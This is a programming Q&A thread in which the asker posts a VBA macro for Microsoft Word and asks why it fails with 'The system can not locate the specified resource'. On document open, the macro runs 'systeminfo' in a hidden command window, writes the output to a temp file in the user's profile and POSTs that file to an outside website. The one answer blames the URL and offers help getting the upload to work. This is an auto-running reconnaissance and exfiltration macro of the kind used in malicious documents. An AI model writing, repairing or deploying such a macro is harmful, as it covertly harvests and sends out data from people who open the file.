# Send file via post in visual basic

Tags: vba, xmlhttprequest

i'm coding a makro in MS Word to execute a command in cmd and send it to the remote server via POST. I have no expirience in VB so the error could be easy to solve, but i have no idea what i'm doing wrong

```
Sub Run_Cmd(command, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "%COMSPEC% /c " & command, visibility, wait_on_execute
End Sub

Sub Run_Program(program, arguments, visibility, wait_on_execute)
Dim WshShell As Variant
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run program & " " & arguments & " ", visibility, wait_on_execute
End Sub

Const INVISIBLE = 0
Const WAIT = True
Private Sub pvPostFile(sUrl As String, sFileName As String, sPath As String, Optional ByVal bAsync As Boolean)
Const STR_BOUNDARY  As String = "3fbd04f5-b1ed-4060-99b9-fca7ff59c113"
Dim nFile           As Integer
Dim baBuffer()      As Byte
Dim sPostData       As String

'--- read file
nFile = FreeFile
Open sPath For Binary Access Read As nFile
If LOF(nFile) > 0 Then
    ReDim baBuffer(0 To LOF(nFile) - 1) As Byte
    Get nFile, , baBuffer
    sPostData = StrConv(baBuffer, vbUnicode)
    MsgBox sPostData
End If
Close nFile
'--- prepare body
sPostData = "--" & STR_BOUNDARY & vbCrLf & _
    "Content-Disposition: form-data; name=""uploadfile""; filename=""" & Mid$(sFileName, InStrRev(sFileName, "\") + 1) & """" & vbCrLf & _
    "Content-Type: application/octet-stream" & vbCrLf & vbCrLf & _
    sPostData & vbCrLf & _
    "--" & STR_BOUNDARY & "--"
'--- post
With CreateObject("Microsoft.XMLHTTP")
    .Open "POST", sUrl, bAsync
    .SetRequestHeader "Content-Type", "multipart/form-data; boundary=" & STR_BOUNDARY
    .Send pvToByteArray(sPostData)
End With
End Sub

Private Function pvToByteArray(sText As String) As Byte()
pvToByteArray = StrConv(sText, vbFromUnicode)
End Function

Sub Workbook_Open()
Run_Cmd "systeminfo > %USERPROFILE%\temp.txt", INVISIBLE, WAIT
Dim envstring As String
envstring = Environ$("USERPROFILE")
envstring = envstring & "\temp.txt"
pvPostFile "http://testujemywordpressa.pl/index.php", "temp.txt", envstring
End Sub
```

debugger says that "The system can not locate the specified resource"

Comment: Try debugging and tell us at which line is throwing you that error.

Comment: What line does the system error on?

Comment: '.Send pvToByteArray(sPostData)'

Answer (score 0):

The reason you are receiving that error message is because the server you are trying to reach doesn't exist.  Check the URL that you are passing to pvPostFile().  I have received this error many times because of bad URLs in the past few months.  Let me know if this works out for you.